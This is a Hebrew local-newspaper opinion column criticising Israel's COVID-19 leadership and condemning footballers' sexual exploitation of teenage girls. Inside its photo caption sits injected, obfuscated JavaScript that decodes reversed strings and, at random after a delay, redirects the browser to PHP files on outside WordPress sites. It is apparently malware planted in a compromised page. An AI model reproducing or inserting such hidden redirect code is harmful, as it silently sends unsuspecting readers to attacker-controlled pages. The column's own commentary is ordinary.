fbpx
[shortcode-weather-atlas city_selector=1178232 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

על הקורונה ועל פרשיית הקטינות והכדורגלנים

על הקורונה: אנו נמצאים בתוך כאוס כלכלי ובריאותי, ונדמה שבמשרד הבריאות עולם כמנהגו נוהג ואין תורת לחימה מוסדרת * על פרשיית הקטינות: מדובר בכשל ערכי מובנה שמעולם לא שמו עליו את הדגש, עד להתפוצצות הנוכחית
צילום: shutterstock
צילום: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

על הקורונה ועל פרשיית הקטינות והכדורגלנים – הטור של צ'רקס

מנהיגות

המשבר הגדול ביותר בתולדות המדינה היה מלחמת יום הכיפורים. הפחד הגדול בצמרת המדינית היה פריצת כוחות למצרים לתוך מרחבי סיני ומשם לתוך ישראל. אלוף פיקוד הדרום היה שמואל גונן גורודיש. באמצע הכאוס, כשהתברר שהאיש לא יודע לנהל את המערכה, הוא הוחלף על ידי הרמטכ"ל דדו ושר הביטחון משה דיין. במקומו הורידו לחזית הדרום את חיים בר לב וכל השאר היסטוריה.

נזכרתי באירוע ההיסטורי הזה, מכיוון שגם עכשיו אנו נמצאים בתוך כאוס כלכלי ובריאותי, הקשורים זה בזה קשר בלתי ניתן להתרה, ונדמה שבמשרד הבריאות עולם כמנהגו נוהג, אין תורת לחימה מוסדרת וההיגיון שבהנחיות לא נתפס על ידי הציבור שמאבד אמון במערכת, רואה אותה בכשליה ושם בחזית את צרכיו האישיים.

זה הזמן למנהיגות, זה הזמן להפסיק את הספינים ולהתרכז בצרה הגדולה שנפלה על כולנו. התחושה בקרב הציבור, ובמיוחד בשכבות שנפגעו כלכלית, שאין דין ואין דיין ואיש הישר בעיניו יעשה. זה מצב חברתי קר מנוכר ומסוכן, שיכול להוביל לכשלים עמוקים יותר בשדה הכלכלי והאזרחי תוך השפעה בלתי נמנעת על הצד הביטחוני.

זה הזמן שמישהו יגלה מנהיגות, זה הזמן למנות גורם מקצועי אחד, אדם אחד בר סמכא שיעסוק אך ורק בקורונה ובמשבר יד ביד עם שר הבריאות. זה גם הזמן לאחריות ממשלתית, להפסקת מחול השדים בין המפלגות ולאיומי בחירות כל שני וחמישי.

הממשלה הגדולה והיקרה בישראל נבחרה והוקמה אך ורק למטרה זו – להוליך אותנו בימי משבר שיכול להימשך עוד חודשים רבים והשלכותיו עדיין לא ניתנות להבנה עד הסוף. וכן. ההיסטוריה מלאה במדינות שכל מה שהיה חסר להן כדי לא לקרוס ולפרוח זו מנהיגות.

שעה קשה

מי שחושב שהפרשה הקשורה לשחקני מכבי תל אביב בכדורגל ותלמידות התיכון היא פרשה ראשונה, לא מכיר את הווי הכדורגלנים בכל העולם. מי שחושב שלא יהיו פרשות כאלה בעתיד, הוא אופטימי, נאיבי ומאמין גדול בטוב שבבני האדם.

הפרשה הזו בעיני איננה נמדדת בתחום הפלילי – האם ידעו או לא ידעו – הפרשה הזו היא תפיסת עולם שבה חלק מהוויית חייו של כדורגלן צעיר ומצליח היא היכולת לתרגם זאת לזיונים ללא בקרת נזקים.

מדובר בכשל ערכי מובנה שמעולם לא שמו עליו את הדגש, עד להתפוצצות הנוכחית. אם הסיפור היה קורה במכבי חיפה, למשל, הייתי מצפה מחלק מהאוהדים להגיש עצומה ליעקב שחר ולדרוש את סילוקם של השניים מהמועדון. הם ביזו בחורות צעירות והפכו אותן לבובות מין לכל דבר ועניין.

לפני שנים היה בקריות אירוע מטלטל, כאשר התברר שמורה מאוד אהוד ומקובל ניסה לנשק תלמידה שלו על חוף הים. הפרשה התגלגלה לתוך מערכה משפטית כאשר התברר שמישהי שהייתה תלמידתו בעבר התלוננה כי שכב איתה כאשר הייתה בת 17. הוא היה בן 30 והיא בת 17, אז זה היה בהסכמה, אבל לבחורה נגרם נזק נפשי בלתי הפיך, משום שמערכת ההבנה והציפיות שלה הייתה אחרת משלו וכמובן שהאחריות האישית שלו באירוע זועקת לשמיים. הוא היה המבוגר האחראי, דמות חינוכית, והקשר היה בתוך מסגרת של יחסי מרות, קשר שהסתיים בנזקים נפשיים מצד אחד ובפיטורים ומאסר מצד שני.

ייתכן שהכדורגלנים ייצאו בעור שיניהם מההיבט הפלילי, אבל הגיעה שעת רצון לשינוי בתוך חדרי ההלבשה, וזה הדבר שאני מצפה שיקרה בעקבות אמירה חדה ונוקבת של בעלי הקבוצות והתאחדות לכדורגל. זוהי השעה שלהם וזהו התפקיד שלהם.

אהבתם את הטור של צ'רקס? טורים נוספים כאן

בקרו אותנו גם בפייסבוק: הד הקריות

אהבתם? שתפו!

תגיות

אולי גם יעניין אותך

שיתוף ברשתות החברתיות